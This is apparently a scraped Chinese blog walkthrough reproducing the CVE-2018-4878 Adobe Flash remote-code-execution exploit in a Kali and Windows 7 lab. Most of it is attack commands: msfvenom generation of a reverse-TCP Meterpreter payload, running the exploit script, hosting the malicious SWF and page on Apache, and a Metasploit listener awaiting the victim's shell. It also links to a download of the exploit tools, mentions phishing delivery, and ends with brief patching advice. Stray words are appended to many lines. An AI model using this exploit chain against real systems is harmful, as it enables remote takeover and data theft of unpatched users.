[漏洞復現] CVE-2018-4878 Flash 0day

一、漏洞概述

2018年2月1號,Adobe官方發佈安全通報(APSA18-01),聲明Adobe Flash 28.0.0.137及其以前的版本,存在高危漏洞(CVE-2018-4878)。html


***者經過構造特殊的Flash連接,當用戶用瀏覽器/郵件/Office訪問此Flash連接時,會被「遠程代碼執行」,而且直接被getshell。python


直到2018年2月5號,Adboe才發佈補丁來修復此0 day漏洞。
web


image.png


互聯網上出現的基於此Flash 0day漏洞進行***的樣本,其實在2017年末就已經由韓國計算機應急小組(KR-CERT)首次發現。shell


目前,全網已經有比較成熟的針對此Flash漏洞的利用代碼,接下來,咱們爲你們復現整個過程。apache


二、漏洞復現環境

Kali Linux + Windows 7 sp1 
***機:Kali Linux (ip:172.16.70.216) 
靶機:Windows 7 sp1 (ip:172.16.70.199) 
exp:cve-2018-4878.py 
flash:flashplayer_activex_28.0.0.137.exewindows

注:此實驗環境所用***機和靶機,跟以前文章所分享一致。爲了節省你們實驗時間,我將此實驗涉及到的工具所有上傳到網盤=> 
連接:https://pan.baidu.com/s/1dotCoCx0AX8sgUaOqFT9vw 密碼:0li0 瀏覽器


image.png


三、實驗流程

①將網盤中的CVE-2018-4878-master目錄下載下來,並放入Kali Linux桌面


image.png


②使用msfvenom生成shell代碼

生成代碼,其中lhost爲kali的ip地址,lport爲自定義的端口號 安全

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.70.216 lport=8888  -f  python>shellcode.txt tcp


image.png


查看代碼文件 
root@kali:~# cat shellcode.txt ide

image.png


③進入CVE-2018-4878-master目錄,編輯CVE-2018-4878.py文件

將上面msfvenom生成的代碼覆蓋掉原來的代碼:

image.png


修改CVE-2018-4878.py下面的文件信息(後面會用到,以後保存修改退出): 

image.png


④Kali Linux進入CVE-2018-4878-master路徑,用Python執行CVE-2018-4878-master.py代碼

root@kali:~/Desktop/CVE-2018-4878-master# python cve-2018-4878.py 
root@kali:~/Desktop/CVE-2018-4878-master# ls -l 

image.png

⑤Kali Linux開啓Apache2服務,並將上面的2個文件放入/var/www/html目錄中(apache web路徑)

root@kali:~/Desktop/CVE-2018-4878-master# service apache2 start 
root@kali:~/Desktop/CVE-2018-4878-master# cp index2.html /var/www/html/index2.html 
root@kali:~/Desktop/CVE-2018-4878-master# cp exploit.swf /var/www/html/exploit.swf 


image.png


此時,Kali Linux上Web服務啓動,而且具有index2.html這個頁面。只要靶機啓用flash並訪問了這個頁面,則能夠直接被控制。

⑥Kali Linux開啓Shell會話監聽

使用handler監聽模塊 
msf > use exploit/multi/handler 
回彈一個tcp鏈接 
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp 
設置kali***機的ip地址 
msf exploit(handler) > set lhost 172.16.70.216 
設置監聽端口,這個需跟上面msfvenom設置的端口一致 
msf exploit(handler) > set lport 8888 
開啓監聽,等待肉雞上線 
msf exploit(handler) > exploit


image.png

⑦Windows7 安裝flash插件,並用IE瀏覽器訪問頁面

搜索flash最新的28版本 

image.png



安裝flash插件 

image.png


使用Win7內置IE 8瀏覽器訪問頁面:http://172.16.70.216/index2.html 

image.png


⑧Kali Linux 上獲取meterpreter shell,並進行管理


image.png


實驗總結: 

能夠看到,最終因爲Flash存在CVE-2018-4878這個高危漏洞,致使Windows靶機訪問含flash的頁面時,直接被Kali Linux控制。 

真實環境下,不少***基於此Flash漏洞,結合社會工程學,例如將網頁連接放置在誘導郵件中,欺騙大量用戶點擊,來達到最規模***效果。

在這裏也呼籲你們:日常要很是當心陌生連接,相似這種「一點就中招」的高級******,確定還有不少沒有浮出水面。像這個2017年其實已經出現的漏洞,早就有***已經在使用了,而中招者徹底不知情,整個***手法很是隱蔽。而2018年2月纔有安全補丁,在這期間,有多少肉雞被控制,這個不可思議。不少0day漏洞,***比大部分人都要提早知曉,在安全廠商沒有出安全公告,或者沒有打安全補丁的狀況下,一個不當心,就會致使電腦被劫持,數據被竊取,形成極大的損失。


四、漏洞修復

①直接到Adobe Flash官網,下載最新版本:https://get.adobe.com/cn/flashplayer/ 
②安裝常見殺毒軟件,開啓實時防禦和殺毒引擎實時升級。



相關推文:

[漏洞復現] MS17-010 基於"永恆之藍"實現Windows Getshell

[漏洞復現] CVE-2017-11882 通殺全部Office版本

[漏洞復現] CVE-2017-16995 Ubuntu16.04

相關文章
相關標籤/搜索